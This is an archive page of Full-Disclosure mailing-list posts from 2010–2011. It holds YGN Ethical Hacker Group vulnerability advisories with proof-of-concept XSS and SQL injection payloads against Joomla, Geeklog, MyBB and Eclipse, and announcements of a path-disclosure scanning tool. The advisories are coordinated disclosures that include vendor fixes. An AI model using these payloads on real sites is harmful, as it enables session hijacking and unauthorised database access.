 PHP and basically do anything you want.  Your vulnerability hinges on
 being able to bypass the CSRF security in place in Drupal.  Seems like a
 bit of a stretch to release this as an advisory.  Why not include the
 fact that if you can bypass the CSRF detection you can also execute
 arbitrary code with the privileges of the web server?




If you 0wn a server, you 0wn one machine

If you 0wn clients, you 0wn thousands of machine.


http://cyberinsecure.com/?s=iframe

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Joomla! 1.0.x ~ 1.0.15 | Cross Site Scripting (XSS) Vulnerability

2011-01-07 Thread YGN Ethical Hacker Group
Joomla! Security Team has confirmed that this issue will not be fixed.


 While noted, your exploit report does not fall within the JSST remit as
 we no longer support J1.0.x branch (as you are aware and indicate).
 The vulnerability mentioned is not known to exist in any current supported 
 release.
 Please ensure you are using the latest version of Joomla!


The advisory has been updated with vendor's response:
http://yehg.net/lab/pr0js/advisories/joomla/core/%5Bjoomla_1.0.x~15%5D_cross_site_scripting

The CVE ID, CVE-2011-0005, has been assigned for it.

 -
 Best regards,
 YGN Ethical Hacker Group
 Yangon, Myanmar
 http://yehg.net
 Our Lab | http://yehg.net/lab
 Our Directory | http://yehg.net/hwd

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Joomla! 1.0.x ~ 1.0.15 | Cross Site Scripting (XSS) Vulnerability

2011-01-05 Thread YGN Ethical Hacker Group
==
 Joomla! 1.0.x ~ 1.0.15 | Cross Site Scripting (XSS) Vulnerability
==


1. OVERVIEW

The Joomla! 1.0.x series are currently vulnerable to Cross Site Scripting.


2. BACKGROUND

Joomla! is a free and open source content management system (CMS) for
publishing content on the World Wide Web and intranets.


3. VULNERABILITY DESCRIPTION

The ordering parameter in a core module,com_search, is not properly
sanitized and thus vulnerable to XSS.
By leveraging this vulnerability, attackers can compromise currently
logged-in user/administrator session and impersonate arbitrary user
actions available under /administrator/ functions. As the
vulnerability is based on the core module, it affects both classic and
customized Joomla! 1.0.x based web sites.


4. VERSIONS AFFECTED

Joomla! 1.0.x ~ 1.0.15 series


5. PROOF-OF-CONCEPT/EXPLOIT

http://attacker.in/joomla1015/index.php?option=com_searchsearchword=xsssearchphrase=anyordering=newest%22%20onmousemove=alert%28document.cookie%29%20style=position:fixed;top:0;left:0;width:100%;height:100%;%22


6. SOLUTION

Joomla 1.0.x series has been at end of life since 2009-07-22.

Upgrade to Joomla! 1.5.x family (1.5.22 as of 2011-01-05)


7. VENDOR

Joomla! Developer Team
http://www.joomla.org


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2011-01-03: notified Joomla! Security Strike Team regardless of EOL status
2011-01-06: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.0.x~15]_cross_site_scripting
Joomla! 1.0.x End of Life -
http://community.joomla.org/blogs/community/509-an-old-friend-comes-of-age.html
OWASP Top 10: http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
CWE-79: http://cwe.mitre.org/data/definitions/79.html


#yehg [2011-01-06]



-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Geeklog 1.7.1 = Cross Site Scripting Vulnerability

2011-01-03 Thread YGN Ethical Hacker Group
==
 Geeklog 1.7.1 = Cross Site Scripting Vulnerability
==


1. OVERVIEW

The Geeklog was vulnerable to Cross Site Scripting in its administration
backend.


2. BACKGROUND

Geeklog is a PHP/MySQL based application for managing dynamic web content.
Out of the box, it is a blog engine, or a CMS with support for comments,
trackbacks,
multiple syndication formats, spam protection, and all the other vital
features of such a system.


3. VULNERABILITY DESCRIPTION

User supplied input is not probably sanitized in the subgroup and
conf_group
parameters when the configuration settings are saved in
/admin/configuration.php.
Attackers who manage to get/bypass anti-csrf token (_glsectoken) via other
means can effectively perform XSS against admin users.


4. VERSIONS AFFECTED

1.7.1 and lower


5. PROOF-OF-CONCEPT/EXPLOIT

[Request]

POST /geeklog/admin/configuration.php HTTP/1.1

_glsectoken=conf_group=Core'--/scriptscriptalert(/XSS/)/scriptsubgroup='--/scriptscriptalert(/XSS/)/script

[/Request]


6. SOLUTION

Upgrade to 1.7.1sr1


7. VENDOR

Geeklog Development Team
http://www.geeklog.net/


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2010-12-31: notified vendor
2011-01-02: vendor released fixed version
2011-01-04: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[geeklog1.7.1]_cross_site_scripting
Vendor Advisory: http://www.geeklog.net/article.php/geeklog-1.7.1sr1
About Geeklog: http://www.geeklog.net/docs/english/#introduction
http://stephensclafani.com/2009/05/26/exploiting-unexploitable-xss/
http://kuza55.blogspot.com/2008/02/exploiting-csrf-protected-xss.html

#yehg [2011-01-04]

-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] MyBB 1.6 = SQL Injection Vulnerability

2010-12-23 Thread YGN Ethical Hacker Group
=
 MyBB 1.6 = SQL Injection Vulnerability
=



1. OVERVIEW

Potential SQL Injection vulnerability was detected in MyBB.


2. APPLICATION DESCRIPTION

MyBB is a free bulletin board system software package developed by the
MyBB Group.
It's supposed to be developed from XMB and DevBB bulletin board applications.


3. VULNERABILITY DESCRIPTION

The keywords parameter was not properly sanitized in /private.php
and /search.php which leads to SQL Injection vulnerability.
Full exploitation  possibility is probably mitigated by clean_keywords
and clean_keywords_ft functions in inc/functions_search.php.


4. VERSIONS AFFECTED

MyBB 1.6 and lower


5. PROOF-OF-CONCEPT/EXPLOIT

= /search.php

POST /mybb/search.php

action=do_searchforums=2keywords='+or+'a'+'apostthread=1


= /private.php

POST /mybb/private.php

my_post_key=keywords='+or+'a'+'aquick_search=Search+PMsallbox=Check+Allfromfid=0fid=4jumpto=4action=do_stuff


6. SOLUTION

Upgrade to 1.6.1


7. VENDOR

MyBB Development Team
http://www.mybb.com/


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2010-12-09: notified vendor
2010-12-15: vendor released fixed version
2010-12-24: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[mybb1.6]_sql_injection
About MyBB: http://www.mybb.com/about/mybb


#yehg [2010-12-24]


-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] MyBB 1.6 = Cross Site Scripting (XSS) Vulnerability

2010-12-19 Thread YGN Ethical Hacker Group

 MyBB 1.6 = Cross Site Scripting (XSS) Vulnerability



1. OVERVIEW

MyBB was vulnerable to Cross Site Scripting Vulnerability.


2. APPLICATION DESCRIPTION

MyBB is a free bulletin board system software package developed by the
MyBB Group.
It's supposed to be developed from XMB and DevBB bulletin board applications.


3. VULNERABILITY DESCRIPTION

Two XSS vulnerabilities were found. One is user-driven XSS on url parameter.
User will get xssed upon successful log-in.
The other is a reflected XSS on posthash parameter where the valid
tid (topic id) is required for successful attack.
The anti-CSRF check against my_post_key parameter was not done in
thread/post preview mode and thus there came a way for XSS to be
successful.


4. VERSIONS AFFECTED

MyBB 1.6 and lower


5. PROOF-OF-CONCEPT/EXPLOIT

User-driven XSS
http://attacker.in/mybb/member.php?action=loginurl=javascript:alert%28/XSS/%29

Reflected XSS
http://attacker.in/mybb/newreply.php?my_post_key=subject=XSSaction=do_newreplyposthash=;scriptalert(/XSS/)/scriptquoted_ids=lastpid=1from_page=1tid=1method=quickreplymessage=testpreviewpost=Preview
Post


6. SOLUTION

Upgrade to 1.6.1


7. VENDOR

MyBB Development Team
http://www.mybb.com/


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2010-12-09: notified vendor
2010-12-15: vendor released fixed version
2010-12-20: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[mybb1.6]_cross_site_scripting
About MyBB: http://www.mybb.com/about/mybb


#yehg [2010-12-20]

-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Eclipse IDE | Help Server Local Cross Site Scripting (XSS) Vulnerability

2010-11-16 Thread YGN Ethical Hacker Group
=
 Eclipse IDE | Help Server Local Cross Site Scripting (XSS) Vulnerability
=


1. OVERVIEW

The Help Content web application of Eclipse IDE was vulnerable to
Cross Site Scripting (XSS) Vulnerability.


2. PRODUCT DESCRIPTION

Eclipse is a multi-language software development environment
comprising an integrated development environment (IDE) and an
extensible plug-in system. It is written mostly in Java and can be
used to develop applications in Java and, by means of various
plug-ins, other programming languages including Ada, C, C++, COBOL,
Perl, PHP, Python, Ruby (including Ruby on Rails framework), Scala,
and Scheme. The IDE is often called Eclipse ADT for Ada, Eclipse CDT
for C/C++, Eclipse JDT for Java, and Eclipse PDT for PHP.


3. VULNERABILITY DESCRIPTION

Eclipse Help Contents are served as a web application via the built-in
Jetty Web Server plugin. Cross Site Scripting vulnerabilities were
found in  /help/index.jsp and /help/advanced/content.jsp URLs. XSS on
/help/advanced/content.jsp url makes the browser hang
but even after clicking Stop Executing button, users can still get XSS.


4. VERSIONS AFFECTED

Eclipse IDE Version: 3.6.1 =

Tested Editions(SDK, Java, J2EE)


5. PROOF-OF-CONCEPT/EXPLOIT

http://localhost:[REPLACE]/help/index.jsp?'onload='alert(0)
http://localhost:[REPLACE]/help/advanced/content.jsp?'onload='alert(0)


6. IMPACT

In a situation where users' browser security settings are weak, the
localized XSS vector could enable attackers to perform a number of
black acts including cross site content access, smb shares
enumeration, remote code execution, malicious trojan downloading and
execution ...etc.


7. SOLUTION

Apply the recent error-free nightly builds (ie.
http://download.eclipse.org/eclipse/downloads/drops/N20101110-2000/index.php)
.
According to the developer, Chris Goldthorpe, the fix is in the
nightly build, 
http://download.eclipse.org/eclipse/downloads/drops/N20101108-2000/index.php
, it will also be in 3.6.2 (February 2011) and 3.7 (June 2011).


8. VENDOR

Eclipse Developers Team
http://www.eclipse.org/


9. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


10. DISCLOSURE TIME-LINE

2010-11-04 : vulnerability discovered
2010-11-05 : notified vendor
2010-11-08 : patch released and applied to svn
2010-11-16 : vulnerability disclosed


11. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/eclipse/[eclipse_help_server]_cross_site_scripting
Eclipse Bug Tracker: https://bugs.eclipse.org/bugs/show_bug.cgi?id=329582
Previous XSS Flaws:
http://r00tin.blogspot.com/2008/04/eclipse-local-web-server-exploitation.html
(searchView.jsp, workingSetManager.jsp)
Cross Environment Hopping:
http://blog.watchfire.com/wfblog/2008/06/cross-environ-1.html
About Eclipse IDE:
https://secure.wikimedia.org/wikipedia/en/wiki/Eclipse_%28software%29

#yehg [2010-11-16]

-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Joomla 1.5.21 | Potential SQL Injection Flaws

2010-11-05 Thread YGN Ethical Hacker Group
This public disclosure has achieved its aim.

Joomla! Team finally patched this hole.


http://developer.joomla.org/security/news/9-security/10-core-security/323-20101101-core-sqli-info-disclosurevulnerabilities.html

Upgrade to the latest Joomla! version (1.5.22 or later).





1. VULNERABILITY DESCRIPTION


Potential SQL Injection Flaws were detected Joomla! CMS version
1.5.20. These flaws were reported along with our Cross Scripting Flaw
which was fixed in 1.5.21. Developers believed that our reported SQL
Injection flaws are not fully exploitable because of Joomla! built-in
string filters and were not fixed in 1.5.21 which is currently the
latest version.

As a result, we disclosed these flaws  in order for someone who can
exploit these flaws to the next maximum level.


2. PROOF-OF-CONCEPT/EXPLOIT

http://yehg.net/lab/pr0js/advisories/joomla/core/1.5.21/sql_injection/sqli_(filter_order)_front.jpg
http://yehg.net/lab/pr0js/advisories/joomla/core/1.5.21/sql_injection/sqli_%28filter_order_Dir%29_front.jpg
http://yehg.net/lab/pr0js/advisories/joomla/core/1.5.21/sql_injection/sqli_%28filter_order_Dir%29_back.jpg


3. DISCLOSURE TIME-LINE


2010-10-06  : Notified Joomla! Security Strike Team
2010-11-01  : Vulnerability disclosed
2010-11-05  : Patched version (1.5.22) released

4. VENDOR

Joomla! Developer Team
http://www.joomla.org
http://www.joomla.org/download.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Joomla 1.5.21 | Potential SQL Injection Flaws

2010-10-31 Thread YGN Ethical Hacker Group
1. VULNERABILITY DESCRIPTION


Potential SQL Injection Flaws were detected Joomla! CMS version
1.5.20. These flaws were reported along with our Cross Scripting Flaw
which was fixed in 1.5.21. Developers believed that our reported SQL
Injection flaws are not fully exploitable because of Joomla! built-in
string filters and were not fixed in 1.5.21 which is currently the
latest version.

As a result, we disclosed these flaws  in order for someone who can
exploit these flaws to the next maximum level.


2. PROOF-OF-CONCEPT/EXPLOIT

http://yehg.net/lab/pr0js/advisories/joomla/core/1.5.21/sql_injection/sqli_(filter_order)_front.jpg
http://yehg.net/lab/pr0js/advisories/joomla/core/1.5.21/sql_injection/sqli_%28filter_order_Dir%29_front.jpg
http://yehg.net/lab/pr0js/advisories/joomla/core/1.5.21/sql_injection/sqli_%28filter_order_Dir%29_back.jpg


3. DISCLOSURE TIME-LINE


2010-10-06  : Notified Joomla! Security Strike Team
2010-11-01  : Vulnerability disclosed


4. VENDOR

Joomla! Developer Team
http://www.joomla.org
http://www.joomla.org/download.html



# YGN Ethical Hacker Group
# http://yehg.net
# 2010-11-1

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Joomla 1.5.21 | Potential SQL Injection Flaws

2010-10-31 Thread YGN Ethical Hacker Group
To clarify, we want excellent guys here to prove/bypass/exploit the
potential issues to enforce developers to fix rather than hiding these
issues. That's what we want to say.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [Tool Update Announcement] inspathx

2010-10-11 Thread YGN Ethical Hacker Group
Check the update via
svn checkout http://inspathx.googlecode.com/svn/trunk/ inspathx


Info about inspathx
http://inspathx.googlecode.com/


Change Log:

-Added username and server path display in console and log output
that looks like

I, [2010-10-14 02:10:08 pid:#6848]  INFO -- : ! Username detected = [victim]
I, [2010-10-14 02:10:08 pid:#6848]  INFO -- : ! Server path extracted
= [/home/victim/htdocs/]

-Added language support
-Modified x argument that accepts each extension separated by comma(s)
(default : php4,php5,php6,php,asp,aspx,jsp,jspx)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Joomla! 1.5.20 = Cross Site Scripting (XSS) Vulnerability

2010-10-09 Thread YGN Ethical Hacker Group
1. OVERVIEW

The Joomla! web application was vulnerable to Cross Site Scripting
vulnerability.


2. PRODUCT DESCRIPTION

Joomla is a free and open source content management system (CMS) for
publishing content on the World Wide Web and intranets. It comprises a
model–view–controller (MVC) Web application framework that can also be
used independently.
Joomla is written in PHP, uses object-oriented programming (OOP)
techniques and software design patterns, stores data in a MySQL
database, and includes features such as page caching, RSS feeds,
printable versions of pages, news flashes, blogs, polls, search, and
support for language internationalization.


3. VULNERABILITY DESCRIPTION

Some URLs in Joomla! do not properly escape encoded user inputs that
lead to cross site scripting vulnerability.
For more information about this kind of vulnerability, see OWASP Top
10 - A2, WASC-8 and
CWE-79: Improper Neutralization of Input During Web Page Generation
('Cross-site Scripting').


4. VERSIONS AFFECTED

Joomla! 1.5.20  and lower


5. PROOF-OF-CONCEPT/EXPLOIT

http://yehg.net/lab/pr0js/training/view/misc/joomla-1.5.20_encoded-xss/


6. IMPACT

Attackers can compromise currently logged-in user/administrator
session and impersonate arbitrary user actions available under
/administrator/ functions.


7. SOLUTION

Upgrade to Joomla! 1.5.21


8. VENDOR

Joomla! Developer Team
http://www.joomla.org


9. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


10. DISCLOSURE TIME-LINE

2010-10-04: vulnerability discovered
2010-10-06: notified vendor
2010-10-09: vendor released fix
2010-10-09: vulnerability disclosed


11. REFERENCES

Vendor Advisory URL:
http://developer.joomla.org/security/news/9-security/10-core-security/322-20101001-core-xss-vulnerabilities.html
Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.5.20]_cross_site_scripting(XSS)
XSS FAQ: http://www.cgisecurity.com/xss-faq.html
OWASP Top 10: http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
CWE-79: http://cwe.mitre.org/data/definitions/79.html




-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [Tool Update Announcement] inspathx - Path Disclosure Finder

2010-10-08 Thread YGN Ethical Hacker Group
UPDATE

Check it out at

svn checkout http://inspathx.googlecode.com/svn/trunk/ inspathx-read-only


For those who don't know inspathx

https://code.google.com/p/inspathx/

_

WHAT¶

A tool that uses local source tree to make requests to the url and
search for path inclusion error messages. It's ever a common problem
in PHP web applications that we're hating to see for ever. We hope
this tool triggers no path disclosure flaws any more. See our article
about path disclosure.

http://yehg.net/lab/pr0js/view.php/path_disclosure_vulnerability.txt



WHY¶

Web application developers sometimes fail to add safe checks against
authentications, file inclusion ..etc are prone to reveal possible
sensitive information when those applications' URLs are directly
requested. Sometimes, it's a clue to File Inclusion vulnerability. For
open-source applications, source code can be downloaded and checked to
find such information.

This script will do this job.

   1. First you have to download source archived file of your desired OSS.
   2. Second, extract it.
   3. Third, feed its path to inspath

The inspath takes

* -d or --dir argument as source directory (of application)
* -u or --url arguement as the target base URL (like http://victim.com)
* -t or --threads argument as the number of threads concurrently
to run (default is 10)
* -l argument as your desired language php,asp,aspx,jsp,all?
(default is all)
* -x argument as your desired extensions separated with |
character (default : php4|php5|php6|php|asp|aspx|jsp|jspx) - make sure
to enclose multiple extensions with double quotes - See Examples

Read the related text:
http://yehg.net/lab/pr0js/view.php/path_disclosure_vulnerability.txt

Similar terms: Full Path Disclosure, Internal Path Leakage



SUPPORTED LANGUAGES¶

* PHP
* ASP(X)
* JSP(X)


HOW¶

ruby inspathx.rb -d /sources/phpmyadmin -u http://localhost/phpmyadmin -t 20

ruby inspathx.rb -d c:/sources/phpmyadmin -u http://localhost/phpmyadmin -t 20

ruby inspathx.rb -d c:/sources/dotnetnuke -u
http://localhost/dotnetnuke -t 20 -l aspx

ruby inspathx.rb -d c:/sources/jspnuke -u http://localhost/jspnuke -t
20 -l jsp -x jsp|jspx



SAMPLE LOGS¶

Mambo 4.6.5 
http://inspathx.googlecode.com/svn/trunk/sample_logs/localhost_mambo_.log

WordPress 3.0.1
http://inspathx.googlecode.com/svn/trunk/sample_logs/localhost_wp_.log


REFERENCES¶

http://www.owasp.org/index.php/Full_Path_Disclosure

http://projects.webappsec.org/Information-Leakage

http://cwe.mitre.org/data/definitions/209.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [New Tool Announcement] inspath - Path Disclosure Finder

2010-09-28 Thread YGN Ethical Hacker Group
WHAT¶

A tool that uses local source tree to make requests to the url and
search for path inclusion error messages. It's ever a common problem
in PHP web applications that we're hating to see for ever. We hope
this tool triggers no path disclosure flaws any more. See our article
about path disclosure.
http://yehg.net/lab/pr0js/view.php/path_disclosure_vulnerability.txt


WHY¶

PHP Web application developers sometimes fail to add safe checks
against authentications, file inclusion ..etc are prone to reveal
possible sensitive information when those applications' URLs are
directly requested. Sometimes, it's a clue to Local File Inclusion
vulnerability. For open-source applications, source code can be
downloaded and checked to find such information.

This script will do this job.

  1. First you have to download source archived file of your desired OSS.
  2. Second, extract it.
  3. Third, feed its path to inspath

The inspath takes

   * -d or --dir argument as source directory (of application)
   * -u or --url arguement as the target base URL (like http://victim.com)
   * -t or --threads argument as the number of threads concurrently
to run (default is 10)

Read the related text:
http://yehg.net/lab/pr0js/view.php/path_disclosure_vulnerability.txt

See the sample scan logs of latest mambo and wordpress applications:

http://inspathx.googlecode.com/svn/trunk/sample_logs/localhost_mambo_.log
http://inspathx.googlecode.com/svn/trunk/sample_logs/localhost_wp_.log


Similar terms: Full Path Dislosure, Internal Path Leakage


HOW¶

ruby inspath.rb -d /sources/phpmyadmin -u http://localhost/phpmyadmin -t 20

ruby inspath.rb -d c:/sources/phpmyadmin -u http://localhost/phpmyadmin -t 20


DOWNLOAD¶

We love svn. Check it out at

svn checkout http://inspathx.googlecode.com/svn/trunk/ inspathx-read-only


REFERENCES¶

http://www.owasp.org/index.php/Full_Path_Disclosure

http://projects.webappsec.org/Information-Leakage

http://cwe.mitre.org/data/definitions/209.html



Use portable bash versions if you wish:

http://www.pentesterscripting.com/discovery/web_requester

http://www.pentesterscripting.com/exploitation/bash_web_parameter_fuzzer

-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  1   2   >